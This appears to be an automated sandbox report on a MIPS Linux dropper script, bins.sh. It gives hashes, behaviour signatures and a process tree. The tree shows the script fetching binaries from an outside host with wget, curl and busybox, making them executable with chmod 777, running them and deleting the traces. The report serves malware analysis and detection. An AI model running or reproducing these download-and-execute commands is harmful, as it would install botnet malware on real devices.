Analysis

  • max time kernel
    139s
  • max time network
    151s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags
    arch:mips
    image:debian9-mipsbe-20240611-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    05/12/2024, 07:52

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    4ec351f49dc5766e37b9f2ca107ea79f

  • SHA1

    1e9e758cc6d6441d23748b0a346dcfc1df30e105

  • SHA256

    c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661

  • SHA512

    5371efb6490ae01946e723c37b09df490d54cc86f0b773d9b3121e608345aca8f92c18f149031f0380cca92eb021bf656abe984568c20fbe7a135211af49e60c

  • SSDEEP

    192:8cfVNYb3Tjdl4z596v3m8MJeyct+8CB596v3w8MJeyhlI0VNYb3TS:8cydl1t+8ulIm

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    PID:699
    • /bin/rm
      /bin/rm bins.sh
      2⤵
      PID:705
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:707
    • /usr/bin/curl
      curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:722
    • /bin/busybox
      /bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
      2⤵
      • System Network Configuration Discovery
      PID:730
    • /bin/chmod
      chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB
      2⤵
      • File and Directory Permissions Modification
      PID:810
    • /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
      ./zZM090BtLw96clc18K3325Bi3InWJUorwB
      2⤵
      • Executes dropped EXE
      PID:811
    • /bin/rm
      rm zZM090BtLw96clc18K3325Bi3InWJUorwB
      2⤵
      PID:814
    • /usr/bin/wget
      wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
      2⤵
      • System Network Configuration Discovery
      PID:815

Network

MITRE ATT&CK Enterprise v15


Downloads

  • /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

    Filesize

    177KB

    MD5

    786d75a158fe731feca3880f436082c0

    SHA1

    79ea2734e43d00cdeabed5586b2c1994d02aef3e

    SHA256

    5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

    SHA512

    7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f